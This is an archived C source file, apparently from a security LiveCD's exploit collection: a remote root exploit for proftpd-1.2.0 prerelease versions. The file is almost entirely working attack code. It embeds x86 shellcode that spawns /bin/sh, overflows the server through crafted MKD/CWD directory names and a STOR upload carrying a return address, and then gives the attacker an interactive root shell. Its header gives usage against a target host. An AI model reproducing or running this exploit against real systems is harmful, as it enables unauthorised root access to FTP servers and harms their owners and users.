home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
ftp
/
proftpd
/
proftp.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
8KB
|
412 lines
/*
* !!!! Private .. ... distribute !!!!
*
* <pro.c> proftpd-1.2.0 remote root exploit (beta2)
* (Still need some code, but it works fine)
*
* Offset: Linux Redhat 6.0
* 0 -> proftpd-1.2.0pre1
* 0 -> proftpd-1.2.0pre2
* 0 -> proftpd-1.2.0pre3
* (If this dont work, try changing the align)
*
* Usage:
* $ cc pro.c -o pro
* $ pro 1.1.1.1 ftp.linuz.com /incoming
*
* ****
* Comunists are still alive ph34r
* A lot of shit to : #cybernet@ircnet
* Greez to Soren,Draven,DaSnake,Nail^D0D,BlackBird,scaina,cliffo,m00n,phroid,Mr-X,inforic
* Dialtone,AlexB,naif,etcetc
* without them this puppy cant be spreaded uaz uaz uaz
* ****
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define RET 0xbffff550
#define ALINEA 0
void logintoftp();
void sh();
void mkd(char *);
void put(char *);
int max(int, int);
char shellcode[] =
"\x90\x90\x31\xc0\x31\xdb\xb0\x17"
"\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
"\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
"\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
"\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
"\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";
char tmp[256];
char name[128], pass[128];
int sockfd;
struct sockaddr_in server, yo;
char inicio[20];
int main(int argc, char **argv)
{
char sendln[1024], recvln[4048], buf1[1000], buf2[200];
struct hostent *host;
char *p, *q;
int len;
int offset = 0;
int align = 0;
int i;
if(argc < 4)
{
printf("usage: pro <your_ip> <host> <dir> [-l name pass] [offset align]\n");
printf("If dont work, try different align values (0 to 3)\n");
exit(0);
}
if(argc >= 5)
{
if(strcmp(argv[4], "-l") == 0)
{
strncpy(name, argv[5], 128);
strncpy(pass, argv[6], 128);
}
else
{
offset = atoi(argv[4]);
}
if(argc == 9)
offset = atoi(argv[7]);
align = atoi(argv[8]);
}
sprintf(inicio, "%s", argv[1]);
if(name[0] == 0 && pass[0] == 0)
{
strcpy(name, "anonymous");
strcpy(pass, "a@a.es");
}
bzero(&server,sizeof(server));
bzero(recvln,sizeof(recvln));
bzero(sendln,sizeof(sendln));
server.sin_family=AF_INET;
server.sin_port=htons(21);
if((host = gethostbyname(argv[2])) != NULL)
{
bcopy(host->h_addr, (char *)&server.sin_addr, host->h_length);
}
else
{
if((server.sin_addr.s_addr = inet_addr(argv[2]))<1)
{
perror("Obteniendo ip");
exit(0);
}
}
bzero((char*)&yo,sizeof(yo));
yo.sin_family = AF_INET;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket()");
exit(0);
}
if((bind(sockfd, (struct sockaddr *)&yo, sizeof(struct sockaddr)))<0)
{
perror("bind()");
exit(0);
}
if(connect(sockfd, (struct sockaddr *)&server, sizeof(server)) < 0)
{
perror("connect()");
exit(0);
}
printf("Destination_ip: %s \nDestination_port: %d\nSource_ip: %s \nSource_port: %d\n",
inet_ntoa(server.sin_addr), ntohs(server.sin_port), inet_ntoa(yo.sin_addr),
ntohs(yo.sin_port));
printf("Connected\n");
getchar();
while((len = read(sockfd, recvln, sizeof(recvln))) > 0)
{
recvln[len] = '\0';
if(strchr(recvln, '\n') != NULL)
break;
}
logintoftp(sockfd);
printf("Logged\n");
bzero(sendln, sizeof(sendln));
memset(buf1, 0x90, 800);
memcpy(buf1, argv[3], strlen(argv[3]));
mkd(argv[3]);
p = &buf1[strlen(argv[3])];
q = &buf1[799];
*q = '\x00';
while(p <= q)
{
strncpy(tmp, p, 100);
mkd(tmp);
p+=100;
}
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x90, 100);
for(i=4-ALINEA-align; i<96; i+=4)
*(long *)&buf2[i] = RET + offset;
p = &buf2[0];
q = &buf2[99];
strncpy(tmp, p, 100);
put(tmp);
sh(sockfd);
close(sockfd);
printf("EOF\n");
}
void mkd(char *dir)
{
char snd[1024], rcv[1024];
char buf[1024], *p;
int n;
bzero(buf,sizeof(buf));
p=buf;
for(n=0;n<strlen(dir);n++)
{
if(dir[n]=='\xff')
{
*p='\xff';
p++;
}
*p=dir[n];
p++;
}
sprintf(snd,"MKD %s\r\n",buf);
write(sockfd,snd,strlen(snd));
bzero(snd,sizeof(snd));
sprintf(snd,"CWD %s\r\n",buf);
write(sockfd,snd,strlen(snd));
bzero(rcv,sizeof(rcv));
while((n=read(sockfd,rcv,sizeof(rcv)))>0)
{
rcv[n]=0;
if(strchr(rcv,'\n')!=NULL)
break;
}
return;
}
void put(char *dir)
{
char snd[1024], rcv[1024];
char buf[1024], *p;
int n;
int sockete, nsock;
int port;
int octeto_in[4];
char *oct;
port=getpid()+1024;
yo.sin_port=htons(port);
bzero(buf,sizeof(buf));
p=buf;
for(n=0;n<strlen(dir);n++)
{
if(dir[n]=='\xff')
{
*p='\xff';
p++;
}
*p=dir[n];
p++;
}
oct=(char *)strtok(inicio,".");
octeto_in[0]=atoi(oct);
oct=(char *)strtok(NULL,".");
octeto_in[1]=atoi(oct);
oct=(char *)strtok(NULL,".");
octeto_in[2]=atoi(oct);
oct=(char *)strtok(NULL,".");
octeto_in[3]=atoi(oct);
sprintf(snd,"PORT %d,%d,%d,%d,%d,%d\r\n",octeto_in[0],octeto_in[1],
octeto_in[2],octeto_in[3],port / 256,port % 256);
write(sockfd,snd,strlen(snd));
// socket
// bind
// listen
if((sockete=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
perror("Socket()");
exit(0);
}
if((bind(sockete,(struct sockaddr *)&yo,sizeof(struct sockaddr)))==-1)
{
perror("Bind()");
close(sockete);
exit(0);
}
if(listen(sockete,10)==-1)
{
perror("Listen()");
close(sockete);
exit(0);
}
bzero(snd, sizeof(snd));
sprintf(snd, "STOR %s\r\n", buf);
write(sockfd, snd, strlen(snd));
// accept
// write
// close
if((nsock=accept(sockete,(struct sockaddr *)&server,(int *)sizeof(struct sockaddr)))==-1)
{
perror("accept()");
close(sockete);
exit(0);
}
write(nsock, "aaaaaaaaa", 10);
close(sockete);
close(nsock);
bzero(rcv, sizeof(rcv));
while((n = read(sockfd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}
void logintoftp()
{
char snd[1024], rcv[1024];
int n;
printf("Logging %s/%s\n", name, pass);
memset(snd, '\0', 1024);
sprintf(snd, "USER %s\r\n", name);
write(sockfd, snd, strlen(snd));
while((n=read(sockfd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
memset(snd, '\0', 1024);
sprintf(snd, "PASS %s\r\n", pass);
write(sockfd, snd, strlen(snd));
while((n=read(sockfd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}
void sh()
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(sockfd, snd, strlen(snd));
for(;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if(FD_ISSET(sockfd, &rset))
{
bzero(rcv, sizeof(rcv));
if((n = read(sockfd, rcv, sizeof(rcv))) == 0)
{
printf("EOF.\n");
exit(0);
}
if(n < 0)
{
perror("read()");
exit(-1);
}
fputs(rcv, stdout);
}
}
}
int max(int x, int y)
{
if(x > y)
return(x);
else
return(y);
}
/* www.hack.co.za [2000]*/
